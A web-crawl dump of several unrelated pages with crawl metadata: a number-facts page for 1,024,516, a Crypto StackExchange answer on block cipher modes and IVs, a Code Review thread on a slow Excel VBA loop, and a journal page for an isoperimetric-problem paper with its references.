And there are approximately 80,114 prime numbers less than or equal to 1,024,516.\n\nDivisibility of 1024516\n\n m n mod m 2 3 4 5 6 7 8 9 0 1 0 1 4 3 4 1\n\nThe number 1,024,516 is divisible by 2 and 4.\n\n• Deficient\n\n• Polite\n\nBase conversion (1024516)\n\nBase System Value\n2 Binary 11111010001000000100\n3 Ternary 1221001101001\n4 Quaternary 3322020010\n5 Quinary 230241031\n6 Senary 33543044\n8 Octal 3721004\n10 Decimal 1024516\n12 Duodecimal 414a84\n20 Vigesimal 6815g\n36 Base36 lyis\n\nBasic calculations (n = 1024516)\n\nMultiplication\n\nn×y\n n×2 2049032 3073548 4098064 5122580\n\nDivision\n\nn÷y\n n÷2 512258 341505 256129 204903\n\nExponentiation\n\nny\n n2 1049633034256 1075365837723820096 1101729506601457269473536 1128739507185298595891949208576\n\nNth Root\n\ny√n\n 2√n 1012.18 100.811 31.8148 15.9259\n\n1024516 as geometric shapes\n\nCircle\n\n Diameter 2.04903e+06 6.43722e+06 3.29752e+12\n\nSphere\n\n Volume 4.50448e+18 1.31901e+13 6.43722e+06\n\nSquare\n\nLength = n\n Perimeter 4.09806e+06 1.04963e+12 1.44888e+06\n\nCube\n\nLength = n\n Surface area 6.2978e+12 1.07537e+18 1.77451e+06\n\nEquilateral Triangle\n\nLength = n\n Perimeter 3.07355e+06 4.54504e+11 887257\n\nTriangular Pyramid\n\nLength = n\n Surface area 1.81802e+12 1.26733e+17 836514\n\nCryptographic Hash Functions\n\nmd5 5c4fa352734f57155cf60053cce18043 8644f3592b991dca6cc77ebd1b4fc28666f63252 c5e3521ae55eb78e5c2badcd4806d1ec0aa261c252b14e21d4ce7b720b907164 d5e63367600871a453b3f6428601bcc5bdc1fe3dd0e08886f24b62a8834db53cb7a145e2e21c2c151126738b16dc1a4f4c3b072bc618811592ca1479764e802e 25c46d14ef3b90aa4b3e19e4f0ed1a35b65e0ea6" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.6138064,"math_prob":0.99153703,"size":4672,"snap":"2022-05-2022-21","text_gpt3_token_len":1672,"char_repetition_ratio":0.12167952,"word_repetition_ratio":0.028443113,"special_character_ratio":0.47131848,"punctuation_ratio":0.08988764,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99660367,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-01-28T00:08:29Z\",\"WARC-Record-ID\":\"<urn:uuid:1978a8f5-60af-4a39-a88f-5a43fa876064>\",\"Content-Length\":\"39246\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:13531791-bda6-42ed-b708-28b231c2b58d>\",\"WARC-Concurrent-To\":\"<urn:uuid:8e5c503f-cdf9-4edf-92b8-b49418b32ea1>\",\"WARC-IP-Address\":\"46.105.53.190\",\"WARC-Target-URI\":\"https://metanumbers.com/1024516\",\"WARC-Payload-Digest\":\"sha1:FRA5PS6XQKABGCDKZ76MVA767BL64VNS\",\"WARC-Block-Digest\":\"sha1:7UFTB33B35R4F3KIBZUR3IF7V6KOPCCN\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-05/CC-MAIN-2022-05_segments_1642320305317.17_warc_CC-MAIN-20220127223432-20220128013432-00642.warc.gz\"}"}
https://crypto.stackexchange.com/questions/24374/why-are-modes-of-operation-used-what-attacks-do-they-prevent
[ "# Why are modes of operation used, what attacks do they prevent?\n\nI know you always need to use a mode of operation when using a block cipher, AES for example, and Wikipedia has a good explanation for what modes of operation are\n\nNow I know if i do not use a mode of operation every time i encrypt the same plain text (abc) with the same key (klm) i get the same cipher text (zyx). the IV in a mode of operation prevents this from happening. But since abc always maps to zyx with the key klm there are some attacks to figure out what key is used.\n\nWhat attacks can be used against only block ciphers?\n\nWhat credible sources explain this?\n\n• Without a mode of operation you can only deterministically encrypt exactly 16 bytes. – CodesInChaos Mar 12 '15 at 10:32\n\nBlock ciphers map bit strings of fixed length to other bit strings of the same length. Hence, using only the block cipher primitive, you can't encrypt more than one block (typically 16 bytes), which is of course undesirable.\n\nThe straight-forward (but bad!) way around this limitation would be to split up the message into chunks of block length and individually encrypt those: this is exactly the description of electronic code book mode (ECB), which is easily seen to be broken under modern security requirements (specifically, it fails indistinguishability under a chosen-plaintext attack since equal plaintext blocks map to equal ciphertext blocks).\n\nHence, other constructions suggest themselves. A good block cipher mode should fulfill at least the following requirements:\n\n• Each block must be encrypted in a different way. Since we want to reuse the same encryption function every time, the variation needs to be introduced somewhere else: For instance, cipher block chaining incorporates the preceding ciphertext block (which is pseudorandom if the cipher is secure) to mask each plaintext block, hence each $$\\mathit{block}$$ is encrypted using the slightly modified cipher $$\\mathit{block}\\mapsto F_k(\\mathit{prev\\_block}\\oplus\\mathit{block})$$, thus satisfying the requirement.\n\nNote that in CBC, the first block has no $$\\mathit{prev\\_block}$$, hence we need to substitute something else for it — this is what is known as an initialization vector (IV). One might be tempted to just use some fixed value, like $$0$$, but this is bad: The first block is not masked, hence an attacker can detect if two messages' prefixes are equal by comparing their corresponding ciphertexts' first blocks. This breaks indistinguishability under a chosen-plaintext attack (for multiple encryptions).\n\n• Encryption must be nondeterministic due to the problem described in the previous paragraph. The easiest way to achieve this for CBC is to just plug in some random value for the IV and transmit it alongside the message. Just like the pseudorandom ciphertext blocks, the randomized IV masks the first plaintext block (and therefore all subsequent since each block depends on its predecessor), hence it hides equal messages and effectively avoids the problems that a fixed IV has.\n\n(Note that while the example describes CBC, about the same arguments could be made for any other block cipher mode.)" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8943231,"math_prob":0.89029664,"size":2379,"snap":"2020-45-2020-50","text_gpt3_token_len":473,"char_repetition_ratio":0.12,"word_repetition_ratio":0.005540166,"special_character_ratio":0.19419925,"punctuation_ratio":0.08737864,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9769106,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-12-05T15:02:35Z\",\"WARC-Record-ID\":\"<urn:uuid:c4aaec0e-4b3c-4645-a129-e1b10bc3a006>\",\"Content-Length\":\"155131\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:111d858d-6487-4be8-8248-0898491ba78d>\",\"WARC-Concurrent-To\":\"<urn:uuid:ae0853eb-89fb-4e7f-bb56-5d1e92d30802>\",\"WARC-IP-Address\":\"151.101.1.69\",\"WARC-Target-URI\":\"https://crypto.stackexchange.com/questions/24374/why-are-modes-of-operation-used-what-attacks-do-they-prevent\",\"WARC-Payload-Digest\":\"sha1:W66XISK7V5EUSPRJWYFWKQFOLKDTCZIY\",\"WARC-Block-Digest\":\"sha1:SRBALQNW36V22226VABCEIZE3S7UQF7D\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-50/CC-MAIN-2020-50_segments_1606141747887.95_warc_CC-MAIN-20201205135106-20201205165106-00714.warc.gz\"}"}
https://codereview.stackexchange.com/questions/60323/inefficient-slow-loop-with-calculations-in-worksheet/60331
[ "# Inefficient (slow) loop with calculations in worksheet\n\nI am looking for best practice help. Slow loops seem to be a recurring problem for me and I'd like to learn a better way. The code itself works as it should, except it is far too slow.\n\nThe problem is the worksheet needs to calculate after each B & i value is dropped into \"N13\" so that \"U12\", \"V12\", and \"W12\" update before being deposited into wsRepository. If I turn Calculation on Manual then my values are no good because they are contingent upon the other worksheet formulas updating (calculating). I think I can copy my worksheets \"off-screen\", calculate, and then paste my values back \"on-screen\", but I am not sure how to do this. I've used variants in the paste to do similar things, but I not comfortable with them. There may even be more efficient ways of achieving my desired result that I am unaware of.\n\nApplication.ScreenUpdating = False\n\nDim wsRepository As Worksheet\nDim wsInput As Worksheet\nDim i As Integer\n\nSet wsRepository = ThisWorkbook.Sheets(\"Repository\")\nSet wsInput = ThisWorkbook.Sheets(\"Input\")\n\nFor i = 4 To 2004\n\nwsInput.Range(\"N13\").Value = wsRepository.Range(\"B\" & i).Value\n\n'copy back amounts\nwsRepository.Range(\"E\" & i).Value = wsInput.Range(\"U12\").Value\nwsRepository.Range(\"C\" & i).Value = wsInput.Range(\"V12\").Value\nwsRepository.Range(\"D\" & i).Value = wsInput.Range(\"W12\").Value\n\nNext i\n\nwsInput.Activate\n\n• How complicated are the formulas in U12, etc.? Can you share them? It would be easier to help if you can. Aug 17, 2014 at 23:02\n\nApplication.ScreenUpdating = False\n\n\nI find it scary that the corresponding = True is nowhere in your code, for reasons already mentioned. Whenever I turn off screen updating, I find it's good UX to also specify a status bar message, and change the mouse cursor to a hourglass. Something along these lines:\n\nPublic Sub ToggleWaitMode(Optional ByVal waitMode As Boolean = False)\nApplication.ScreenUpdating = waitMode\nApplication.Calculation = IIf(waitMode, xlCalculationManual, xlCalculationAutomatic)\nApplication.StatusBar = IIf(waitMode, \"Please wait...\", vbNullString)\nApplication.Cursor = IIf(waitMode, xlWait, xlDefault)\nEnd Sub\n\n\nWhich makes your procedure stub look like this:\n\nOption Explicit\n\nPublic Sub DoSomething()\nOn Error GoTo ErrHandler\nToggleWaitMode True\n\n'do that thing\n\nCleanExit:\nIf Not Application.ScreenUpdating Then ToggleWaitMode\nExit Sub\nErrHandler:\nToggleWaitMode\n' handle errors here\nResume CleanExit\nEnd Sub\n\n\nIf I turn Calculation on Manual then my values are no good because...\n\nIf I understand properly, you need to update $N$13 some 2,000 times with a value that's in \"$B$\" & i, and then I guess $U$12, $V$12 and $W$12 need to be recalculated accordingly.\n\nYou haven't shown us what these cells contain and what cells their formula is referring to, but if they're the only cells that need to be recalculated when $N$13 changes, then you can force calculation like this:\n\nwsInput.Range(\"$U$12\").Calculate\nwsInput.Range(\"$V$12\").Calculate\nwsInput.Range(\"$W$12\").Calculate\n\n\nBut that might not speed up anything. 
You're pretty much stuck, since you need to recalculate these three cells before you can do anything, and you need to do that 2,000 times.\n\nI think you're somewhat misusing VBA here, it looks like you could use 3 hidden columns (say, $AA$4:$AC$2004) and use Excel formulas to automatically calculate the would-be \"U\", \"V\" and \"W\" values for each row; the VBA macro could then just copy values from Input!$AA$4:$AC$2004 to Repository!$C$4:$E$2004... if a macro is even needed for that.\n\nI would suggest naming the ranges/cells in row 12 - anytime you have a specific cell with a specific meaning, it's always better for the VBA code to refer to the meaning rather than the cells' addresses.\n\nI have no clue what these cells mean, but picture this:\n\nDim interestRate As Double\ninterestRate = wsInput.Range(\"InterestRate\").Value\n\n\nThis extra abstraction level somewhat decouples the VBA code from the worksheet structure, which allows you to modify [at least parts of] the worksheet without having to modify the VBA code - for example you could insert another row and now InterestRate is read in row 13 instead of 12, and the VBA code couldn't care less.\n\nYou can define names in the [Formulas] Ribbon tab, under the [Defined Names] section. Or you can just select the cell and type its name in the address/names dropdown, just left of the formula bar.\n\nThis also has the advantage of making your Excel formulas more readable: instead of =$X$12*$N42 a formula can now look like =InterestRate*$N42\n\nOne last thing, I know it's common to call a worksheet variable like wsInput, but I find it sounds backwards and looks Hungarian. I'd call it inputSheet instead; wsRepository would be repositorySheet. Also it wouldn't hurt to rename i for row.\n\nTwo short things that may even be unneeded if you have already excluded them.\n\n## Use Option Explicit\n\nFor one it helps immensely when searching for errors with spelling. Been there, done that. It's gruesome.\nSecondly it helps you with writing code that's more similar to \"real\" programming languages. Nothing against VBA, but I much prefer languages where you need to declare your variables.\n\n## Use an error handler.\n\nEvery time you turn off screen updating you get into the dangerous zone of \"breaking\" the application in case something goes wrong.\n\nInstead do something along the lines of:\n\nOption Explicit\nOn Error GoTo ErrorHandler\n\n' a whole lot of code\n\nErrorHandler:\nApplication.ScreenUpdating = True\nMsgBox \"An error has occurred\"\n'Whatever else you need to do and probably something like\nExit Sub\n\n\nI'm not sure this will work for you, but consider replacing or duplicating the formulas in your \"12\" cells with an Evaluate call. It's a little tricky to avoid runtime errors, so I suggest reading this. It might look something like this.\n\n'wsRepository.Range(\"E\" & i).Value = wsInput.Range(\"U12\").Value\nwsRepository.Range(\"E\" & i).Value = Evaluate(\"SUM(A1:A10)\")\n\n\nOf course, using the formula in U12. Your mileage may vary, but this should let you set calculation to manual (I think). I would prefer the method Mat's Mug described though. This is just another option to try.\n\n## Some other notes\n\n• i is typically used as a loop counter, but row would be more meaningful.\n• 4 and 2004 are mysterious hardcoded numbers. What a lot of programmers refer to as magic numbers. It would be good for readability/maintainability to replace them with startRow and lastRow constants.\n• Great comments in my opinion. They're short and clear.
Not too much, not too little.\n• I'm not sure why you activate wsInput at the end, but you do a great job of avoiding it elsewhere, make sure you're not needlessly activating the sheet there.\n• I wouldn't expect Evaluate to speed things up though. Aug 18, 2014 at 1:09\n• No. It wouldn't, but it may allow OP to use manual calculation @Mat'sMug and that would speed it up. (Assuming there are many other cells that wouldn't need to be recalculated). It's a stretch, but may be worth a shot. Aug 18, 2014 at 1:13" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8616817,"math_prob":0.68679774,"size":3337,"snap":"2023-40-2023-50","text_gpt3_token_len":817,"char_repetition_ratio":0.10021002,"word_repetition_ratio":0.0,"special_character_ratio":0.23104584,"punctuation_ratio":0.12948518,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.966219,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-10-03T11:05:00Z\",\"WARC-Record-ID\":\"<urn:uuid:7c369567-40ee-469a-8035-d6a4dcb763d1>\",\"Content-Length\":\"189133\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:5eca7462-6e8d-402d-a712-985c93f5c34a>\",\"WARC-Concurrent-To\":\"<urn:uuid:9d7515db-760c-4ee2-85a4-b32b6cc64707>\",\"WARC-IP-Address\":\"104.18.11.86\",\"WARC-Target-URI\":\"https://codereview.stackexchange.com/questions/60323/inefficient-slow-loop-with-calculations-in-worksheet/60331\",\"WARC-Payload-Digest\":\"sha1:55AIVYFT4FDSTGYV7FG7UNB4W77UAZDL\",\"WARC-Block-Digest\":\"sha1:YFAVLAONBQRR4LGGC47R4DOZKPWTH2P7\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-40/CC-MAIN-2023-40_segments_1695233511075.63_warc_CC-MAIN-20231003092549-20231003122549-00861.warc.gz\"}"}
https://www.aimsciences.org/article/doi/10.3934/cpaa.2018129
[ "", null, "", null, "", null, "", null, "November  2018, 17(6): 2729-2749. doi: 10.3934/cpaa.2018129\n\n## On the isoperimetric problem with perimeter density $r^p$\n\n Universitat Politècnica de Catalunya, member of BGSMath, Barcelona, Spain\n\n* Corresponding author\n\nReceived  December 2016 Revised  July 2017 Published  June 2018\n\nFund Project: The author is supported by FONDECYT grant 11150017.\n\nIn this paper the author studies the isoperimetric problem in ${\\mathbb{R}}^n$ with perimeter density $|x|^p$ and volume density 1. We settle completely the case $n = 2$, completing a previous work by the author: we characterize the case of equality if $0≤p≤1$ and deal with the case $-∞<p<-1$ (with the additional assumption $0∈Ω$). In the case $n≥3$ we deal mainly with the case $-∞<p<0$, showing among others that the results in 2 dimensions do not generalize for the range $-n+1<p<0.$\n\nCitation: Gyula Csató. On the isoperimetric problem with perimeter density $r^p$. Communications on Pure & Applied Analysis, 2018, 17 (6) : 2729-2749. doi: 10.3934/cpaa.2018129\n##### References:\n A. Alvino, F. Brock, F. Chiacchio, A. Mercaldo and M. R. Posteraro, Some isoperimetric inequalities on ${\\mathbb{R}}^n$ with respect to weights $|x|^{α}$, J. Math. Anal. Appl., 1 (2017), 280-318.  doi: 10.1016/j.jmaa.2017.01.085.", null, "", null, "Google Scholar A. Adimurthi and K. Sandeep, A singular Moser-Trudinger embedding and its applications, NoDEA Nonlinear Differential Equations Appl., 13 (2007), 585-603.  doi: 10.1007/s00030-006-4025-9.", null, "", null, "Google Scholar M. F. Betta, F. Brock, A. Mercaldo and M. R. Posteraro, A weighted isoperimetric inequality and applications to symmetrization, J. of Inequal. and Appl., 4 (1999), 215-240.  doi: 10.1155/S1025583499000375.", null, "", null, "Google Scholar W. Boyer, B. Brown, G. R. Chambers, A. Loving and S. Tammen, Isoperimetric Regions in $\\mathbb{R}^n$ with density $r^p$, Anal. Geom. Metr. Spaces, 4 (2016), 236-265.  doi: 10.1515/agms-2016-0009.", null, "", null, "Google Scholar V. Bayle, A. Cañete, F. Morgan and C. Rosales, On the isoperimetric problem in Euclidean space with density, Calc. Var. Partial Differential Equations, 31 (2008), 27-46.  doi: 10.1007/s00526-007-0104-y.", null, "", null, "Google Scholar X. Cabré and X. Ros-Oton, Sobolev and isoperimetric inequalities with monomial weights, J. Differential Equations, 255 (2013), 4312-4336.  doi: 10.1016/j.jde.2013.08.010.", null, "", null, "Google Scholar X. Cabré, X. Ros-Oton and J. Serra, Euclidean balls solve some isoperimetric problems with nonradial weights, C. R. Math. Acad. Sci. Paris, 350 (2012), 945-947.  doi: 10.1016/j.crma.2012.10.031.", null, "", null, "Google Scholar A. Cañete, M. Miranda and D. Vittone, Some isoperimetric problems in planes with density, J. Geom. Anal., 20 (2010), 243-290.  doi: 10.1007/s12220-009-9109-4.", null, "", null, "Google Scholar C. Carroll, A. Jacob, C. Quinn and R. Walters, The isoperimetric problem on planes with density, Bull. Aust. Math. Soc., 78 (2008), 177-197.  doi: 10.1017/S000497270800052X.", null, "", null, "Google Scholar G. R. Chambers, Proof of the log-convex density conjecture, J. Eur. Math. Soc., to appear. Google Scholar G. Csató, An isoperimetric problem with density and the Hardy-Sobolev inequality in ${\\mathbb{R}}^2$, Differential Integral Equations, 28 (2015), 971-988.", null, "Google Scholar G. Csató and P. Roy, Extremal functions for the singular Moser-Trudinger inequality in 2 dimensions, Calc. Var. 
Partial Differential Equations, 54 (2015), 2341-2366.  doi: 10.1007/s00526-015-0867-5.", null, "", null, "Google Scholar G. Csató and P. Roy, The singular Moser-Trudinger inequality on simply connected domains, Communications in Partial Differential Equations, 41 (2016), 838-847.  doi: 10.1080/03605302.2015.1123276.", null, "", null, "Google Scholar J. Dahlberg, A. Dubbs, E. Newkirk and H. Tran, Isoperimetric regions in the plane with density $r^p$, New York J. Math., 16 (2010), 31-51.", null, "Google Scholar A. Díaz, N. Harman, S. Howe and D. Thompson, Isoperimetric problems in sectors with density, Adv. Geom., 12 (2012), 589-619.", null, "Google Scholar J. L. Barbosa and M. do Carmo, Stability of hypersurfaces with constant mean curvature, Math. Z., 185 (1984), 339-353.  doi: 10.1007/BF01215045.", null, "", null, "Google Scholar A. Figalli and F. Maggi, On the isoperimetric problem for radial log-convex densities, Calc. Var. Partial Differential Equations, 48 (2013), 447-489.  doi: 10.1007/s00526-012-0557-5.", null, "", null, "Google Scholar M. Flucher, Extremal functions for the Trudinger-Moser inequality in 2 dimensions, Comment. Math. Helvetici, 67 (1992), 471-497.  doi: 10.1007/BF02566514.", null, "", null, "Google Scholar N. Fusco, F. Maggi and A. Pratelli, On the isoperimetric problem with respect to a mixed Euclidean-Gaussian density, J. Funct. Anal., 260 (2011), 3678-3717.  doi: 10.1016/j.jfa.2011.01.007.", null, "", null, "Google Scholar L. Di Giosia, J. Habib, L. Kenigsberg, D. Pittman and W. Zhu, Balls Isoperimetric in ${\\mathbb{R}}^n$ with Volume and Perimeter Densities $r^m$ and $r^k$, preprint, arXiv: 1610.05830v1. Google Scholar F. Morgan, Regularity of isoperimetric hypersurfaces in Riemannian manifolds, Trans. Amer. Math. Soc., 355 (2003), 5041-5052.  doi: 10.1090/S0002-9947-03-03061-7.", null, "", null, "Google Scholar F. Morgan and A. Pratelli, Existence of isoperimetric regions in $\\mathbb{R}^n$ with density, Ann. Global Anal. Geom., 43 (2013), 331-365.  doi: 10.1007/s10455-012-9348-7.", null, "", null, "Google Scholar W. Walter, Ordinary Differential Equations, English translation, Springer, 1998. doi: 10.1007/978-1-4612-0601-9.", null, "", null, "Google Scholar\n\nshow all references\n\n##### References:\n A. Alvino, F. Brock, F. Chiacchio, A. Mercaldo and M. R. Posteraro, Some isoperimetric inequalities on ${\\mathbb{R}}^n$ with respect to weights $|x|^{α}$, J. Math. Anal. Appl., 1 (2017), 280-318.  doi: 10.1016/j.jmaa.2017.01.085.", null, "", null, "Google Scholar A. Adimurthi and K. Sandeep, A singular Moser-Trudinger embedding and its applications, NoDEA Nonlinear Differential Equations Appl., 13 (2007), 585-603.  doi: 10.1007/s00030-006-4025-9.", null, "", null, "Google Scholar M. F. Betta, F. Brock, A. Mercaldo and M. R. Posteraro, A weighted isoperimetric inequality and applications to symmetrization, J. of Inequal. and Appl., 4 (1999), 215-240.  doi: 10.1155/S1025583499000375.", null, "", null, "Google Scholar W. Boyer, B. Brown, G. R. Chambers, A. Loving and S. Tammen, Isoperimetric Regions in $\\mathbb{R}^n$ with density $r^p$, Anal. Geom. Metr. Spaces, 4 (2016), 236-265.  doi: 10.1515/agms-2016-0009.", null, "", null, "Google Scholar V. Bayle, A. Cañete, F. Morgan and C. Rosales, On the isoperimetric problem in Euclidean space with density, Calc. Var. Partial Differential Equations, 31 (2008), 27-46.  doi: 10.1007/s00526-007-0104-y.", null, "", null, "Google Scholar X. Cabré and X. 
Ros-Oton, Sobolev and isoperimetric inequalities with monomial weights, J. Differential Equations, 255 (2013), 4312-4336.  doi: 10.1016/j.jde.2013.08.010.", null, "", null, "Google Scholar X. Cabré, X. Ros-Oton and J. Serra, Euclidean balls solve some isoperimetric problems with nonradial weights, C. R. Math. Acad. Sci. Paris, 350 (2012), 945-947.  doi: 10.1016/j.crma.2012.10.031.", null, "", null, "Google Scholar A. Cañete, M. Miranda and D. Vittone, Some isoperimetric problems in planes with density, J. Geom. Anal., 20 (2010), 243-290.  doi: 10.1007/s12220-009-9109-4.", null, "", null, "Google Scholar C. Carroll, A. Jacob, C. Quinn and R. Walters, The isoperimetric problem on planes with density, Bull. Aust. Math. Soc., 78 (2008), 177-197.  doi: 10.1017/S000497270800052X.", null, "", null, "Google Scholar G. R. Chambers, Proof of the log-convex density conjecture, J. Eur. Math. Soc., to appear. Google Scholar G. Csató, An isoperimetric problem with density and the Hardy-Sobolev inequality in ${\\mathbb{R}}^2$, Differential Integral Equations, 28 (2015), 971-988.", null, "Google Scholar G. Csató and P. Roy, Extremal functions for the singular Moser-Trudinger inequality in 2 dimensions, Calc. Var. Partial Differential Equations, 54 (2015), 2341-2366.  doi: 10.1007/s00526-015-0867-5.", null, "", null, "Google Scholar G. Csató and P. Roy, The singular Moser-Trudinger inequality on simply connected domains, Communications in Partial Differential Equations, 41 (2016), 838-847.  doi: 10.1080/03605302.2015.1123276.", null, "", null, "Google Scholar J. Dahlberg, A. Dubbs, E. Newkirk and H. Tran, Isoperimetric regions in the plane with density $r^p$, New York J. Math., 16 (2010), 31-51.", null, "Google Scholar A. Díaz, N. Harman, S. Howe and D. Thompson, Isoperimetric problems in sectors with density, Adv. Geom., 12 (2012), 589-619.", null, "Google Scholar J. L. Barbosa and M. do Carmo, Stability of hypersurfaces with constant mean curvature, Math. Z., 185 (1984), 339-353.  doi: 10.1007/BF01215045.", null, "", null, "Google Scholar A. Figalli and F. Maggi, On the isoperimetric problem for radial log-convex densities, Calc. Var. Partial Differential Equations, 48 (2013), 447-489.  doi: 10.1007/s00526-012-0557-5.", null, "", null, "Google Scholar M. Flucher, Extremal functions for the Trudinger-Moser inequality in 2 dimensions, Comment. Math. Helvetici, 67 (1992), 471-497.  doi: 10.1007/BF02566514.", null, "", null, "Google Scholar N. Fusco, F. Maggi and A. Pratelli, On the isoperimetric problem with respect to a mixed Euclidean-Gaussian density, J. Funct. Anal., 260 (2011), 3678-3717.  doi: 10.1016/j.jfa.2011.01.007.", null, "", null, "Google Scholar L. Di Giosia, J. Habib, L. Kenigsberg, D. Pittman and W. Zhu, Balls Isoperimetric in ${\\mathbb{R}}^n$ with Volume and Perimeter Densities $r^m$ and $r^k$, preprint, arXiv: 1610.05830v1. Google Scholar F. Morgan, Regularity of isoperimetric hypersurfaces in Riemannian manifolds, Trans. Amer. Math. Soc., 355 (2003), 5041-5052.  doi: 10.1090/S0002-9947-03-03061-7.", null, "", null, "Google Scholar F. Morgan and A. Pratelli, Existence of isoperimetric regions in $\\mathbb{R}^n$ with density, Ann. Global Anal. Geom., 43 (2013), 331-365.  doi: 10.1007/s10455-012-9348-7.", null, "", null, "Google Scholar W. Walter, Ordinary Differential Equations, English translation, Springer, 1998. doi: 10.1007/978-1-4612-0601-9.", null, "", null, "Google Scholar\n Kai Yang. Scattering of the focusing energy-critical NLS with inverse square potential in the radial case. 
Communications on Pure & Applied Analysis, 2021, 20 (1) : 77-99. doi: 10.3934/cpaa.2020258 Manil T. Mohan. First order necessary conditions of optimality for the two dimensional tidal dynamics system. Mathematical Control & Related Fields, 2020  doi: 10.3934/mcrf.2020045 Parikshit Upadhyaya, Elias Jarlebring, Emanuel H. Rubensson. A density matrix approach to the convergence of the self-consistent field iteration. Numerical Algebra, Control & Optimization, 2021, 11 (1) : 99-115. doi: 10.3934/naco.2020018 Teresa D'Aprile. Bubbling solutions for the Liouville equation around a quantized singularity in symmetric domains. Communications on Pure & Applied Analysis, 2021, 20 (1) : 159-191. doi: 10.3934/cpaa.2020262 Lin Shi, Xuemin Wang, Dingshi Li. Limiting behavior of non-autonomous stochastic reaction-diffusion equations with colored noise on unbounded thin domains. Communications on Pure & Applied Analysis, 2020, 19 (12) : 5367-5386. doi: 10.3934/cpaa.2020242 Wenbin Li, Jianliang Qian. Simultaneously recovering both domain and varying density in inverse gravimetry by efficient level-set methods. Inverse Problems & Imaging, , () : -. doi: 10.3934/ipi.2020073 Zedong Yang, Guotao Wang, Ravi P. Agarwal, Haiyong Xu. Existence and nonexistence of entire positive radial solutions for a class of Schrödinger elliptic systems involving a nonlinear operator. Discrete & Continuous Dynamical Systems - S, 2020  doi: 10.3934/dcdss.2020436 Lihong Zhang, Wenwen Hou, Bashir Ahmad, Guotao Wang. Radial symmetry for logarithmic Choquard equation involving a generalized tempered fractional $p$-Laplacian. Discrete & Continuous Dynamical Systems - S, 2020  doi: 10.3934/dcdss.2020445 Min Chen, Olivier Goubet, Shenghao Li. Mathematical analysis of bump to bucket problem. Communications on Pure & Applied Analysis, 2020, 19 (12) : 5567-5580. doi: 10.3934/cpaa.2020251 Qingfang Wang, Hua Yang. Solutions of nonlocal problem with critical exponent. Communications on Pure & Applied Analysis, 2020, 19 (12) : 5591-5608. doi: 10.3934/cpaa.2020253 Maoding Zhen, Binlin Zhang, Vicenţiu D. Rădulescu. Normalized solutions for nonlinear coupled fractional systems: Low and high perturbations in the attractive case. Discrete & Continuous Dynamical Systems - A, 2020  doi: 10.3934/dcds.2020379 Yongxiu Shi, Haitao Wan. Refined asymptotic behavior and uniqueness of large solutions to a quasilinear elliptic equation in a borderline case. Electronic Research Archive, , () : -. doi: 10.3934/era.2020119 Stefano Bianchini, Paolo Bonicatto. Forward untangling and applications to the uniqueness problem for the continuity equation. Discrete & Continuous Dynamical Systems - A, 2020  doi: 10.3934/dcds.2020384 Reza Lotfi, Zahra Yadegari, Seyed Hossein Hosseini, Amir Hossein Khameneh, Erfan Babaee Tirkolaee, Gerhard-Wilhelm Weber. A robust time-cost-quality-energy-environment trade-off with resource-constrained in project management: A case study for a bridge construction project. Journal of Industrial & Management Optimization, 2020  doi: 10.3934/jimo.2020158 Marco Ghimenti, Anna Maria Micheletti. Compactness results for linearly perturbed Yamabe problem on manifolds with boundary. Discrete & Continuous Dynamical Systems - S, 2020  doi: 10.3934/dcdss.2020453 Alberto Bressan, Sondre Tesdal Galtung. A 2-dimensional shape optimization problem for tree branches. Networks & Heterogeneous Media, 2020  doi: 10.3934/nhm.2020031 Fioralba Cakoni, Pu-Zhao Kow, Jenn-Nan Wang. The interior transmission eigenvalue problem for elastic waves in media with obstacles. 
Inverse Problems & Imaging, , () : -. doi: 10.3934/ipi.2020075 Shun Zhang, Jianlin Jiang, Su Zhang, Yibing Lv, Yuzhen Guo. ADMM-type methods for generalized multi-facility Weber problem. Journal of Industrial & Management Optimization, 2020  doi: 10.3934/jimo.2020171 Gloria Paoli, Gianpaolo Piscitelli, Rossanno Sannipoli. A stability result for the Steklov Laplacian Eigenvalue Problem with a spherical obstacle. Communications on Pure & Applied Analysis, 2021, 20 (1) : 145-158. doi: 10.3934/cpaa.2020261 Marion Darbas, Jérémy Heleine, Stephanie Lohrengel. Numerical resolution by the quasi-reversibility method of a data completion problem for Maxwell's equations. Inverse Problems & Imaging, 2020, 14 (6) : 1107-1133. doi: 10.3934/ipi.2020056\n\n2019 Impact Factor: 1.105" ]
[ null, "https://www.aimsciences.org:443/style/web/images/white_google.png", null, "https://www.aimsciences.org:443/style/web/images/white_facebook.png", null, "https://www.aimsciences.org:443/style/web/images/white_twitter.png", null, "https://www.aimsciences.org:443/style/web/images/white_linkedin.png", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, 